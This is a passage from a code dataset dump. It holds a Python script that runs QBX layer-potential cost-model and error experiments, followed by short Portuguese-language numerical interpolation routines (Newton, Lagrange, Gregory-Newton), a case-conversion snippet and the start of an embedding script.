bound_op = bind(lpot_source, op)\n\n density_discr = lpot_source.density_discr\n nodes = density_discr.nodes().with_queue(queue)\n sigma = cl.clmath.sin(10 * nodes[0])\n\n if kind == 
\"actual\":\n timing_data = {}\n result = bound_op.eval(\n queue, {\"sigma\": sigma}, timing_data=timing_data)\n assert not np.isnan(result.get(queue)).any()\n result = one(timing_data.values())\n\n elif kind == \"model\":\n perf_results = bound_op.get_modeled_performance(queue, sigma=sigma)\n result = one(perf_results.values())\n\n return result\n\n# }}}\n\n\n# {{{ green error getter\n\ndef get_green_error(geometry_getter, lpot_kwargs, center, k,\n vis_error_filename=None, vis_order=TARGET_ORDER):\n \"\"\"Return the Green identity error for a geometry.\n\n The density function for the Green error is the on-surface restriction of\n the potential due to a source charge in the exterior of the geometry, whose\n location is specified. The error is reported relative to the norm of the\n density.\n\n Params:\n\n geometry_getter: Geometry getter\n lpot_kwargs: Constructor args to QBXLayerPotentialSource\n center: Center of source charge used to obtain the constructed density\n k: Helmholtz parameter\n\n Returns:\n\n A dictionary containing Green identity errors in l^2 and l^infty norm\n \"\"\"\n context = cl.create_some_context(interactive=False)\n queue = cl.CommandQueue(context)\n lpot_source = geometry_getter(queue, lpot_kwargs)\n\n d = lpot_source.ambient_dim\n\n u_sym = sym.var(\"u\")\n dn_u_sym = sym.var(\"dn_u\")\n\n from sumpy.kernel import LaplaceKernel, HelmholtzKernel\n lap_k_sym = LaplaceKernel(d)\n if k == 0:\n k_sym = lap_k_sym\n knl_kwargs = {}\n else:\n k_sym = HelmholtzKernel(d)\n knl_kwargs = {\"k\": sym.var(\"k\")}\n\n S_part = (\n sym.S(k_sym, dn_u_sym, qbx_forced_limit=-1, **knl_kwargs))\n\n D_part = (\n sym.D(k_sym, u_sym, qbx_forced_limit=\"avg\", **knl_kwargs))\n\n sym_op = S_part - D_part - 0.5 * u_sym\n\n density_discr = lpot_source.density_discr\n\n # {{{ compute values of a solution to the PDE\n\n nodes_host = density_discr.nodes().get(queue)\n normal = bind(density_discr, sym.normal(d))(queue).as_vector(np.object)\n normal_host = [normal[j].get() for j in range(d)]\n\n if k != 0:\n if d == 2:\n angle = 0.3\n wave_vec = np.array([np.cos(angle), np.sin(angle)])\n u = np.exp(1j*k*np.tensordot(wave_vec, nodes_host, axes=1))\n grad_u = 1j*k*wave_vec[:, np.newaxis]*u\n else:\n diff = nodes_host - center[:, np.newaxis]\n r = la.norm(diff, axis=0)\n u = np.exp(1j*k*r) / r\n grad_u = diff * (1j*k*u/r - u/r**2)\n else:\n diff = nodes_host - center[:, np.newaxis]\n dist_squared = np.sum(diff**2, axis=0)\n dist = np.sqrt(dist_squared)\n if d == 2:\n u = np.log(dist)\n grad_u = diff/dist_squared\n elif d == 3:\n u = 1/dist\n grad_u = -diff/dist**3\n else:\n assert False\n\n dn_u = 0\n for i in range(d):\n dn_u = dn_u + normal_host[i]*grad_u[i]\n\n # }}}\n\n u_dev = cl.array.to_device(queue, u)\n dn_u_dev = cl.array.to_device(queue, dn_u)\n grad_u_dev = cl.array.to_device(queue, grad_u)\n\n bound_op = bind(lpot_source, sym_op)\n error = bound_op(queue, u=u_dev, dn_u=dn_u_dev, grad_u=grad_u_dev, k=k)\n\n scaling_l2 = 1 / norm(density_discr, queue, u_dev, p=2)\n scaling_linf = 1 / norm(density_discr, queue, u_dev, p=\"inf\")\n\n if vis_error_filename is not None:\n from meshmode.discretization.visualization import make_visualizer\n bdry_vis = make_visualizer(queue, lpot_source.density_discr, vis_order)\n bdry_vis.write_vtk_file(vis_error_filename, [\n (\"green_zero\", error),\n (\"u_dev\", u_dev),\n ])\n\n err_l2 = scaling_l2 * norm(density_discr, queue, error, p=2)\n err_linf = scaling_linf * norm(density_discr, queue, error, p=\"inf\")\n\n return dict(err_l2=err_l2, 
err_linf=err_linf)\n\n# }}}\n\n\n# {{{ parameter study - vary parameter with constant geometry\n\ndef run_parameter_study(\n param_name, param_values, geometry_getter,\n lpot_kwargs, which_op, helmholtz_k):\n \"\"\"Run the cost model over a geometry, varying a single parameter value.\n\n Params:\n\n param_name: Parameter name (a constructor arg\n to QBXLayerPotentialSource)\n param_values: Range of values to check\n geometry_getter: Geometry getter\n lpot_kwargs: Baseline constructor args to QBXLayerPotentialSource\n which_op: \"S\" or \"D\"\n helmholtz_k: Helmholtz parameter\n\n Returns:\n A list of dictionaries, each of which holds the parameter value and\n cost model result\n \"\"\"\n param_values = list(param_values)\n task_params = []\n for value in param_values:\n task_param = lpot_kwargs.copy()\n task_param[param_name] = value\n task_params.append(task_param)\n\n with multiprocessing.Pool(POOL_WORKERS) as pool:\n results = pool.map(\n partial(\n get_lpot_cost,\n which_op, helmholtz_k, geometry_getter, kind=\"model\"),\n task_params)\n\n results = [\n {\n \"param_name\": param_name,\n \"param_value\": value,\n \"cost\": cost}\n for value, cost in zip(param_values, results)]\n\n return results\n\n\ndef get_optimal_parameter_value(results):\n \"\"\"Given a list of results as returned by *run_parameter_study*,\n return the parameter value minimizing total cost.\n \"\"\"\n best_result = min(\n results,\n key=lambda res: sum(res[\"cost\"].get_predicted_times().values()))\n\n return best_result[\"param_value\"]\n\n# }}}\n\n\n# {{{ geometry study - vary geometry with constant parameters\n\ndef run_geometry_study(geometry_getters, lpot_kwargs, which_op, helmholtz_k):\n \"\"\"Run the cost model over a set of geometries.\n\n Params:\n\n geometry_getters: Geometry getters\n lpot_kwargs: Constructor kwargs to QBXLayerPotentialSource\n which_op: \"S\" or \"D\"\n helmholtz_k: Helmholtz parameter\n\n Returns:\n\n A list of dictionaries, each of which contain a geometry label and a\n cost model output\n \"\"\"\n with multiprocessing.Pool(POOL_WORKERS) as pool:\n results = pool.map(\n partial(get_lpot_cost, which_op, helmholtz_k,\n lpot_kwargs=lpot_kwargs, kind=\"model\"),\n geometry_getters)\n\n results = [\n {\n \"geometry\": geo.label,\n \"cost\": cost}\n for geo, cost in zip(geometry_getters, results)]\n\n return results\n\n# }}}\n\n\n# {{{ green error study - obtain green error for a geometry family\n\ndef run_green_error_study(\n geometry_getters, lpot_kwargs, center, helmholtz_k):\n \"\"\"Compute the Green error for a family of geometries, in parallel.\n\n Params:\n\n geometry_getters: Geometry getters\n geometry_label: Geometry labels in output\n lpot_kwargs: Constructor kwargs to QBXLayerPotentialSource\n center: Center used for constructed density\n helmholtz_k: Helmholtz parameter\n\n Returns:\n\n A list of dictionaries, each of which contain a geometry label and an\n error result\n \"\"\"\n with multiprocessing.Pool(POOL_WORKERS) as pool:\n err_results = pool.map(\n partial(\n get_green_error,\n lpot_kwargs=lpot_kwargs, center=center, k=helmholtz_k),\n geometry_getters)\n\n results = [\n {\n \"geometry\": geo.label,\n \"error\": err}\n for geo, err in zip(geometry_getters, err_results)]\n\n return results\n\n# }}}\n\n\n# {{{ tune parameters for a single geometry\n\ndef run_tuning_study(\n tuning_geometry, lpot_kwargs, baseline_nmax_range,\n baseline_nmpole_range, tsqbx_nmax_range,\n tsqbx_nmpole_range, which_op, helmholtz_k):\n \"\"\"Find the parameters which give the best observed 
performance, with and\n without target-specific QBX.\n\n Params:\n\n tuning_geometry: Geometry getter\n label: Label for saving results\n lpot_kwargs: Base kwargs for the QBXLayerPotentialSource\n which_op: \"S\" or \"D\"\n helmholtz_k: Helmholtz parameter\n\n The arguments *baseline_nmax_range*, *baseline_nmpole_range*,\n *tsqbx_nmax_range*, *tsqbx_nmpole_range* are the ranges of values which\n are to be checked for the respective parameter value.\n \"\"\"\n lpot_kwargs = lpot_kwargs.copy()\n label = tuning_geometry.label\n\n # {{{ figure out baseline nmax\n\n logger.info(\"finding baseline value of nmax\")\n\n baseline_nmax_results = run_parameter_study(\n \"_max_leaf_refine_weight\",\n baseline_nmax_range,\n tuning_geometry,\n lpot_kwargs,\n which_op,\n helmholtz_k)\n\n output_fname = f\"tuning-study-{label}-baseline-nmax.json\"\n with make_output_file(output_fname) as outfile:\n output_data(baseline_nmax_results, outfile)\n\n baseline_nmax = get_optimal_parameter_value(baseline_nmax_results)\n lpot_kwargs[\"_max_leaf_refine_weight\"] = baseline_nmax\n logger.info(\"baseline value of nmax: %d\", baseline_nmax)\n\n # }}}\n\n # {{{ figure out baseline nmpole\n\n logger.info(\"finding baseline value of nmpole\")\n\n baseline_nmpole_results = run_parameter_study(\n \"_from_sep_smaller_min_nsources_cumul\",\n baseline_nmpole_range,\n tuning_geometry,\n lpot_kwargs,\n which_op,\n helmholtz_k)\n\n output_fname = f\"tuning-study-{label}-baseline-nmpole.json\"\n with make_output_file(output_fname) as outfile:\n output_data(baseline_nmpole_results, outfile)\n\n baseline_nmpole = get_optimal_parameter_value(baseline_nmpole_results)\n lpot_kwargs[\"_from_sep_smaller_min_nsources_cumul\"] = baseline_nmpole\n logger.info(\"baseline value of nmpole: %d\", baseline_nmpole)\n\n # }}}\n\n # {{{ figure out nmax for tsqbx\n\n logger.info(\"finding optimal nmax value when using tsqbx\")\n lpot_kwargs[\"_use_target_specific_qbx\"] = True\n\n tsqbx_nmax_results = run_parameter_study(\n \"_max_leaf_refine_weight\",\n tsqbx_nmax_range,\n tuning_geometry,\n lpot_kwargs,\n which_op,\n helmholtz_k)\n\n output_fname = f\"tuning-study-{label}-tsqbx-nmax.json\"\n with make_output_file(output_fname) as outfile:\n output_data(tsqbx_nmax_results, outfile)\n\n tsqbx_nmax = get_optimal_parameter_value(tsqbx_nmax_results)\n lpot_kwargs[\"_max_leaf_refine_weight\"] = tsqbx_nmax\n logger.info(\"optimal nmax value for tsqbx: %d\", tsqbx_nmax)\n\n # }}}\n\n # {{{ figure out nmpole for tsqbx\n\n logger.info(\"finding optimal nmpole value for tsqbx\")\n\n tsqbx_nmpole_results = run_parameter_study(\n \"_from_sep_smaller_min_nsources_cumul\",\n tsqbx_nmpole_range,\n tuning_geometry,\n lpot_kwargs,\n which_op,\n helmholtz_k)\n\n output_fname = f\"tuning-study-{label}-tsqbx-nmpole.json\"\n with make_output_file(output_fname) as outfile:\n output_data(tsqbx_nmpole_results, outfile)\n\n tsqbx_nmpole = get_optimal_parameter_value(tsqbx_nmpole_results)\n lpot_kwargs[\"_from_sep_smaller_min_nsources_cumul\"] = tsqbx_nmpole\n logger.info(\"optimal nmpole value for tsqbx: %d\", tsqbx_nmpole)\n\n # }}}\n\n result = dict(\n baseline_nmax=baseline_nmax,\n baseline_nmpole=baseline_nmpole,\n tsqbx_nmax=tsqbx_nmax,\n tsqbx_nmpole=tsqbx_nmpole)\n\n params_fname = f\"tuning-params-{label}.json\"\n with make_params_file(params_fname) as outfile:\n output_data(result, outfile)\n\n# }}}\n\n\n# {{{ collect results of applying optimizations on a set of geometries\n\ndef run_optimization_study(\n geometry_getters, label, lpot_kwargs, params, which_op, 
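# which_op selects the layer potential ('S' or 'D'); helmholtz_k == 0 selects the Laplace kernel\n        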
helmholtz_k):\n \"\"\"Apply a sequence of optimizations to a set of geometries and record\n performance results.\n\n Params:\n\n geometry_getters: List of geometry getters\n label: Label for saving results\n lpot_kwargs: Baseline kwargs for the QBXLayerPotentialSource\n params: Params obtained as result of *run_tuning_study*\n which_op: \"S\" or \"D\"\n helmholtz_k: Helmholtz parameter\n \"\"\"\n\n # {{{ opt level 0\n\n logger.info(\"Obtaining baseline performance\")\n\n lpot_kwargs = lpot_kwargs.copy()\n\n lpot_kwargs[\"_use_target_specific_qbx\"] = False\n lpot_kwargs[\"_max_leaf_refine_weight\"] = params[\"baseline_nmax\"]\n lpot_kwargs[\"_from_sep_smaller_min_nsources_cumul\"] = (\n params[\"baseline_nmpole\"])\n\n opt0_results = run_geometry_study(\n geometry_getters,\n lpot_kwargs,\n which_op,\n helmholtz_k)\n\n output_fname = f\"optimization-study-{label}-opt0.json\"\n with make_output_file(output_fname) as outfile:\n output_data(opt0_results, outfile)\n\n # }}}\n\n # {{{ opt level 1\n\n logger.info(\"Obtaining performance with TSQBX\")\n\n lpot_kwargs[\"_use_target_specific_qbx\"] = True\n\n opt1_results = run_geometry_study(\n geometry_getters,\n lpot_kwargs,\n which_op,\n helmholtz_k)\n\n output_fname = f\"optimization-study-{label}-opt1.json\"\n with make_output_file(output_fname) as outfile:\n output_data(opt1_results, outfile)\n\n # }}}\n\n # {{{ opt level 2\n\n logger.info(\"Obtaining performance with TSQBX + optimal nmax\")\n\n lpot_kwargs[\"_max_leaf_refine_weight\"] = params[\"tsqbx_nmax\"]\n\n opt2_results = run_geometry_study(\n geometry_getters,\n lpot_kwargs,\n which_op,\n helmholtz_k)\n\n output_fname = f\"optimization-study-{label}-opt2.json\"\n with make_output_file(output_fname) as outfile:\n output_data(opt2_results, outfile)\n\n # }}}\n\n # {{{ opt level 3\n\n logger.info(\n \"Obtaining performance with TSQBX + \"\n \"optimal nmax + optimal nmpole\")\n\n lpot_kwargs[\"_from_sep_smaller_min_nsources_cumul\"] = (\n params[\"tsqbx_nmpole\"])\n\n opt3_results = run_geometry_study(\n geometry_getters,\n lpot_kwargs,\n which_op,\n helmholtz_k)\n\n output_fname = f\"optimization-study-{label}-opt3.json\"\n with make_output_file(output_fname) as outfile:\n output_data(opt3_results, outfile)\n\n # }}}\n\n# }}}\n\n\n# {{{ lpot kwargs\n\ndef urchin_lpot_kwargs():\n lpot_kwargs = DEFAULT_LPOT_KWARGS.copy()\n\n lpot_kwargs[\"performance_model\"] = PerformanceModel(\n calibration_params=load_params(\n \"calibration-params-urchin.json\"))\n\n assert lpot_kwargs[\"fmm_order\"] == 15\n assert lpot_kwargs[\"qbx_order\"] == 5\n\n return lpot_kwargs\n\n\ndef donut_lpot_kwargs():\n lpot_kwargs = DEFAULT_LPOT_KWARGS.copy()\n\n lpot_kwargs[\"performance_model\"] = PerformanceModel(\n calibration_params=load_params(\n \"calibration-params-donut.json\"))\n\n lpot_kwargs[\"fmm_order\"] = 20\n lpot_kwargs[\"qbx_order\"] = 9\n\n return lpot_kwargs\n\n\ndef plane_lpot_kwargs():\n lpot_kwargs = DEFAULT_LPOT_KWARGS.copy()\n\n lpot_kwargs[\"performance_model\"] = PerformanceModel(\n calibration_params=load_params(\n \"calibration-params-plane.json\"))\n\n # These are supplied by the geometry getter.\n del lpot_kwargs[\"qbx_order\"]\n del lpot_kwargs[\"fmm_order\"]\n del lpot_kwargs[\"fmm_backend\"]\n\n return lpot_kwargs\n\n# }}}\n\n\n# {{{ fit calibration params\n\ndef fit_calibration_params(geometry_getters, lpot_kwargs_list, which_op, helmholtz_k):\n \"\"\"Find calibration parameters for running a layer potential operator\n on a particular list of geometries.\n\n Params:\n geometry_getters: 
A list of geometry getters\n lpot_kwargs_list: A list of corresponding lpot kwargs\n which_op: \"S\" or \"D\"\n helmholtz_k: Helmholtz parameter\n\n Returns:\n A dictionary containing keys *model_results*, *timing_results*\n and *calibration_params*.\n \"\"\"\n context = cl.create_some_context(interactive=False)\n queue = cl.CommandQueue(context)\n\n from pytential.qbx.performance import (\n PerformanceModel, estimate_calibration_params)\n\n model_results = []\n timing_results = []\n\n for geo_getter, lpot_kwargs in zip(geometry_getters, lpot_kwargs_list):\n model_result = get_lpot_cost(which_op, helmholtz_k,\n geo_getter, lpot_kwargs, \"model\")\n model_results.append(model_result)\n timing_result = get_lpot_cost(which_op, helmholtz_k,\n geo_getter, lpot_kwargs, \"actual\")\n timing_results.append(timing_result)\n\n result = {}\n result[\"model_results\"] = model_results\n result[\"timing_results\"] = timing_results\n result[\"calibration_params\"] = (\n estimate_calibration_params(model_results, timing_results))\n\n return result\n\n# }}}\n\n\ndef run_urchin_calibration_params_experiment():\n urchins = (\n urchin_geometry_getter(3),\n urchin_geometry_getter(3),\n urchin_geometry_getter(5),\n urchin_geometry_getter(5))\n\n lpot_kwargs_nots = urchin_lpot_kwargs()\n lpot_kwargs_ts = lpot_kwargs_nots.copy()\n lpot_kwargs_ts[\"_use_target_specific_qbx\"] = True\n\n lpot_kwargs_list = (\n lpot_kwargs_nots,\n lpot_kwargs_ts,\n lpot_kwargs_nots,\n lpot_kwargs_ts)\n\n result = fit_calibration_params(urchins, lpot_kwargs_list, \"S\", 0)\n\n with make_output_file(\"calibration-params-fitting-urchin.json\") as outfile:\n output_data(result, outfile)\n\n with make_params_file(\"calibration-params-urchin.json\") as outfile:\n output_data(result[\"calibration_params\"], outfile)\n\n\ndef run_urchin_time_prediction_experiment():\n urchins = [urchin_geometry_getter(k) for k in URCHIN_PARAMS]\n\n results = run_geometry_study(urchins, urchin_lpot_kwargs(), \"S\", 0)\n\n with make_output_file(\"time-prediction-urchin-modeled-costs.json\")\\\n as outfile:\n output_data(results, outfile)\n\n\ndef run_urchin_tuning_study_experiment():\n tuning_urchin = urchin_geometry_getter(TUNING_URCHIN, \"urchin\")\n\n baseline_nmax_range = range(32, 512, 32)\n baseline_nmpole_range = range(0, 300, 20)\n tsqbx_nmax_range = range(32, 2000, 64)\n tsqbx_nmpole_range = range(0, 500, 20)\n\n run_tuning_study(\n tuning_urchin, urchin_lpot_kwargs(),\n baseline_nmax_range, baseline_nmpole_range,\n tsqbx_nmax_range, tsqbx_nmpole_range,\n which_op=\"S\", helmholtz_k=0)\n\n\ndef run_urchin_optimization_study_experiment():\n tuning_params = load_params(\"tuning-params-urchin.json\")\n\n urchins = [urchin_geometry_getter(k) for k in URCHIN_PARAMS]\n\n run_optimization_study(\n urchins, \"urchin\", urchin_lpot_kwargs(),\n tuning_params, \"S\", helmholtz_k=0)\n\n\ndef run_urchin_green_error_experiment():\n urchins = [urchin_geometry_getter(k) for k in URCHIN_PARAMS]\n center = np.array([3., 1., 2.])\n\n results = run_green_error_study(\n urchins, urchin_lpot_kwargs(), center, helmholtz_k=0)\n\n with make_output_file(\"green-error-urchin.json\") as outfile:\n output_data(results, outfile)\n\n\ndef run_donut_calibration_params_experiment():\n # nrows=5 is the same as tau_{10}\n donuts = (\n donut_geometry_getter(5, \"donut\"),\n donut_geometry_getter(5, \"donut\"))\n\n lpot_kwargs_nots = donut_lpot_kwargs()\n lpot_kwargs_ts = lpot_kwargs_nots.copy()\n lpot_kwargs_ts[\"_use_target_specific_qbx\"] = True\n\n lpot_kwargs_list = (\n 
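# one kwargs dict per donut geometry above: first without, then with target-specific QBX\n        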
lpot_kwargs_nots,\n lpot_kwargs_ts)\n\n result = fit_calibration_params(donuts, lpot_kwargs_list, \"S\", 0)\n\n with make_output_file(\"calibration-params-fitting-donut.json\") as outfile:\n output_data(result, outfile)\n\n with make_params_file(\"calibration-params-donut.json\") as outfile:\n output_data(result[\"calibration_params\"], outfile)\n\n\ndef run_donut_tuning_study_experiment():\n # nrows=5 is the same as tau_{10}\n tuning_donut = donut_geometry_getter(5, \"donut\")\n\n baseline_nmax_range = range(32, 512, 32)\n baseline_nmpole_range = range(0, 300, 20)\n tsqbx_nmax_range = range(32, 2000, 64)\n tsqbx_nmpole_range = range(0, 500, 20)\n\n run_tuning_study(\n tuning_donut, donut_lpot_kwargs(),\n baseline_nmax_range, baseline_nmpole_range,\n tsqbx_nmax_range, tsqbx_nmpole_range,\n which_op=\"S\", helmholtz_k=0)\n\n\ndef run_donut_optimization_study_experiment():\n tuning_params = load_params(\"tuning-params-donut.json\")\n donut = [donut_geometry_getter(5)]\n\n run_optimization_study(\n donut, \"donut\", donut_lpot_kwargs(),\n tuning_params, \"S\", helmholtz_k=0)\n\n\ndef run_donut_green_error_experiment():\n donut = [donut_geometry_getter(5)]\n center = np.array([0.] * 3)\n\n results = run_green_error_study(\n donut, donut_lpot_kwargs(), center, helmholtz_k=0)\n\n with make_output_file(\"green-error-donut.json\") as outfile:\n output_data(results, outfile)\n\n\ndef run_plane_calibration_params_experiment():\n planes = (\n plane_geometry_getter(),\n plane_geometry_getter())\n\n lpot_kwargs_nots = plane_lpot_kwargs()\n lpot_kwargs_ts = lpot_kwargs_nots.copy()\n lpot_kwargs_ts[\"_use_target_specific_qbx\"] = True\n\n lpot_kwargs_list = (\n lpot_kwargs_nots,\n lpot_kwargs_ts)\n\n result = fit_calibration_params(planes, lpot_kwargs_list, \"D\", 20)\n\n with make_output_file(\"calibration-params-fitting-plane.json\") as outfile:\n output_data(result, outfile)\n\n with make_params_file(\"calibration-params-plane.json\") as outfile:\n output_data(result[\"calibration_params\"], outfile)\n\n\ndef run_plane_tuning_study_experiment():\n tuning_plane = plane_geometry_getter()\n\n baseline_nmax_range=range(50, 200, 50)\n baseline_nmpole_range=range(10, 100, 10)\n tsqbx_nmax_range=range(100, 500, 50)\n tsqbx_nmpole_range=range(50, 300, 50)\n\n run_tuning_study(\n tuning_plane, plane_lpot_kwargs(),\n baseline_nmax_range, baseline_nmpole_range,\n tsqbx_nmax_range, tsqbx_nmpole_range,\n which_op=\"D\", helmholtz_k=20)\n\n\ndef run_plane_optimization_study_experiment():\n tuning_params = load_params(\"tuning-params-plane.json\")\n plane = [plane_geometry_getter()]\n\n run_optimization_study(\n plane, \"plane\", plane_lpot_kwargs(),\n tuning_params, \"D\", helmholtz_k=20)\n\n\ndef run_plane_bvp_experiment():\n if any(\n os.path.exists(os.path.join(BVP_OUTPUT_DIR, fname))\n for fname in (\n \"potential-0.25.vts\", \"result.pkl.gz\", \"source-0.25.vtu\")):\n raise RuntimeError(\n \"not running plane-bvp experiment - delete or move \"\n \"the output files in \"\n \"the directory '%s' to run\" % BVP_OUTPUT_DIR)\n\n lpot_kwargs = plane_lpot_kwargs()\n\n tuning_params = load_params(\"tuning-params-plane.json\")\n lpot_kwargs[\"_use_target_specific_qbx\"] = True\n lpot_kwargs[\"_max_leaf_refine_weight\"] = (\n tuning_params[\"tsqbx_nmax\"])\n lpot_kwargs[\"_from_sep_smaller_min_nsources_cumul\"] = (\n tuning_params[\"tsqbx_nmpole\"])\n\n cl_ctx = cl.create_some_context(interactive=False)\n queue = cl.CommandQueue(cl_ctx)\n\n from inteq_tests import (\n run_int_eq_test, BetterplaneIntEqTestCase)\n\n result 
= run_int_eq_test(\n cl_ctx,\n queue,\n BetterplaneIntEqTestCase(20, \"dirichlet\", +1),\n resolution=0.25,\n visualize=True,\n lpot_kwargs=lpot_kwargs,\n output_dir=BVP_OUTPUT_DIR)\n\n gmres_result = result.gmres_result\n\n result_dict = dict(\n h_max=result.h_max,\n rel_err_2=result.rel_err_2,\n rel_err_inf=result.rel_err_inf,\n rel_td_err_inf=result.rel_td_err_inf,\n gmres_result=dict(\n solution=gmres_result.solution.get(queue),\n residual_norms=gmres_result.residual_norms,\n iteration_count=gmres_result.iteration_count,\n success=gmres_result.success,\n stat=gmres_result.state))\n\n with gzip.open(os.path.join(BVP_OUTPUT_DIR, \"result.pkl.gz\"), \"wb\")\\\n as outfile:\n pickle.dump(result_dict, outfile)\n\n\ndef run_experiments(experiments):\n # Urchin calibration params\n if \"urchin-calibration-params\" in experiments:\n run_urchin_calibration_params_experiment()\n\n # Time prediction\n if \"urchin-time-prediction\" in experiments:\n run_urchin_time_prediction_experiment()\n\n # Tuning study for urchins\n if \"urchin-tuning-study\" in experiments:\n run_urchin_tuning_study_experiment()\n\n # Optimization study for urchin family\n if \"urchin-optimization-study\" in experiments:\n run_urchin_optimization_study_experiment()\n\n # Green error for urchin family\n if \"urchin-green-error\" in experiments:\n run_urchin_green_error_experiment()\n\n # Torus grid calibration params\n if \"donut-calibration-params\" in experiments:\n run_donut_calibration_params_experiment()\n\n # Optimization study for torus grid\n if \"donut-optimization-study\" in experiments:\n run_donut_optimization_study_experiment()\n\n # Tuning study for torus grid\n if \"donut-tuning-study\" in experiments:\n run_donut_tuning_study_experiment()\n\n # Green error for torus grid\n if \"donut-green-error\" in experiments:\n run_donut_green_error_experiment()\n\n # Plane calibration params\n if \"plane-calibration-params\" in experiments:\n run_plane_calibration_params_experiment()\n\n # Plane tuning study\n if \"plane-tuning-study\" in experiments:\n run_plane_tuning_study_experiment()\n\n # Plane tuning study\n if \"plane-optimization-study\" in experiments:\n run_plane_optimization_study_experiment()\n\n # Plane BVP\n if \"plane-bvp\" in experiments:\n run_plane_bvp_experiment()\n\n\nEXPERIMENTS = (\n \"urchin-calibration-params\",\n \"urchin-time-prediction\",\n \"urchin-tuning-study\",\n \"urchin-optimization-study\",\n \"urchin-green-error\",\n\n \"donut-calibration-params\",\n \"donut-tuning-study\",\n \"donut-optimization-study\",\n \"donut-green-error\",\n\n \"plane-calibration-params\",\n \"plane-tuning-study\",\n \"plane-optimization-study\",\n \"plane-bvp\",\n)\n\n\ndef main():\n description = \"This script collects data from one or more experiments.\"\n experiments = utils.parse_experiments_from_command_line(\n description, EXPERIMENTS)\n run_experiments(experiments)\n\n\nif __name__ == \"__main__\":\n # Avoid issues with fork()-based multiprocessing and pyopencl - see\n # https://github.com/inducer/pyopencl/issues/156\n multiprocessing.set_start_method(\"spawn\")\n main()\n\n\n# vim: foldmethod=marker\n","repo_name":"mattwala/gigaqbx-ts-paper-code","sub_path":"generate-data.py","file_name":"generate-data.py","file_ext":"py","file_size_in_byte":33998,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"39219291227","text":"import numpy as np\n\ndef metodo_newton():\n\tqtde_pontos = int(input(\"Quantos pontos?\"))\n\tpontos, fPontos =[], []\n\ttabela 
= []\n\t\n\tfor i in range(qtde_pontos):\n\t\tponto = float(input('x%d=' %i))\n\t\tfPonto = float(input('y%d=' %i))\n\t\tpontos.append(ponto)\n\t\tfPontos.append(fPonto)\n\ttabela.append(fPontos)\n\n\tx = float(input(\"ponto a ser estimado\"))\n\t\n\tpasso = 1\n\tfor n in range(qtde_pontos - 1):\n\t\tordem =[]\n\t\tfor m in range(len(tabela[n]) - 1):\n\t\t\tdiferencaDividida = (tabela[n][m + 1] - tabela[n][m])/(pontos[m + passo] - pontos[m])\n\t\t\tordem.append(diferencaDividida)\n\t\ttabela.append(ordem)\n\t\tpasso += 1\n\n\tfor k in range(len(tabela)):\n\t\tprint('Ordem %d: '%k, tabela[k])\n\tprint()\n\n\t# accumulate Newton's form: both counters must start at zero\n\tgrau = 0\n\taprox = 0\n\tfor i in range(len(tabela)):\n\t\tfator = tabela[i][0]\n\t\tfor j in range(grau):\n\t\t\tfator *= (x - pontos[j])\n\t\tgrau += 1\n\t\taprox += fator\n\n\tprint('Aproximação encontrada= %f' % aprox)\n\ndef lagrange(qtde_pontos):\n\tX, Y = [], []\n\n\tfor i in range(qtde_pontos):\n\t\tx = float(input(\"x\" + str(i) + \"=\"))\n\t\tX.append(x)\n\t\ty = float(input(\"y\" + str(i) + \"=\"))\n\t\tY.append(y)\n\n\tx = float(input(\"valor a interpolar\"))\n\tcoeficientes =[]\n\n\tfor indice in range(qtde_pontos):\n\t\tL = 1\n\t\tfor j in range(len(X)):\n\t\t\tif indice != j:\n\t\t\t\tL *= (x - X[j])/(X[indice] - X[j])\n\t\tcoeficientes.append(L)\n\n\tpn = 0\n\n\tfor i in range(len(coeficientes)):\n\t\tpn += Y[i] * coeficientes[i]\n\n\tprint(\"p(\"+str(x)+\") = \", pn)\n\ndef gregory_newton(m, x, y, z):\n\txx = np.arange(0, 0.9, 0.01)\n\tf = []\n\n\tfor ii in range(len(xx)):\n\t\ty = z\n\t\tp = y[0]\n\t\ta = []\n\t\th = x[1] - x[0]\n\t\ts0 = (xx[ii] - x[0])/h\n\t\ts = 1\n\t\ta.append(y[0])\n\t\tfor i in range(m - 1):\n\t\t\tdelf = []\n\t\t\tfor j in range(m - 1 - i):\n\t\t\t\tdelf.append(y[j + 1] - y[j])\n\t\t\ts *= (s0 - i) / (i + 1)\n\t\t\tp += s * delf[0]\n\t\t\ty = delf\n\t\t\ta.append(y[0])\n\t\tf.append(p)\n\tprint(xx[-1], p)\n\nprint(\"----------MENU----------\")\nprint(\"1 - Newton\")\nprint(\"2 - Lagrange\")\nprint(\"3 - Gregory-Newton\")\nprint(\"------------------------\")\nprint(\"Informe o método\")\nmet = input()\n\nif met == \"1\":\n\t'''\n\tprint(\"Entradas do exemplo 4.6\")\n\tmetodo_newton(4, 0.5, 0, 0)\n\t'''\n\tmetodo_newton()\nelif met == \"2\":\n\tqtde_pontos = int(input(\"Quantos pontos?\"))\n\tlagrange(qtde_pontos)\nelif met == \"3\":\n\tm = 5\n\tx = [0, 0.2, 0.4, 0.6, 0.8]\n\ty = [0.12, 0.46, 0.74, 0.9, 1.2]\n\tz = y\n\tgregory_newton(m, x, y, z)\nelse:\n\tprint(\"Entrada invalida\")\n","repo_name":"lucasvlbsnts/algoritmos-calculo-numerico","sub_path":"tc4.py","file_name":"tc4.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"9297423144","text":"s=input()\n\ndef convert(s):\n    count_up=0\n    count_low=0\n    for c in s:\n        if c.isupper():\n            count_up+=1\n        if c.islower():\n            count_low+=1\n    if count_up>count_low:\n        print(s.upper())\n    else:\n        print(s.lower())\n\nconvert(s)","repo_name":"duongquy2404/sourceCodePython","sub_path":"chuHoaChuThuong.py","file_name":"chuHoaChuThuong.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31834711133","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author:XuMing(xuming624@qq.com)\n@description:\n\ncode from https://github.com/FlagOpen/FlagEmbedding\n\"\"\"\n\nimport argparse\nimport json\nimport random\nimport sys\n\nimport faiss\nfrom tqdm import tqdm\n\nsys.path.append('../..')\nfrom text2vec import SentenceModel\n\n\ndef get_args():\n    parser = 
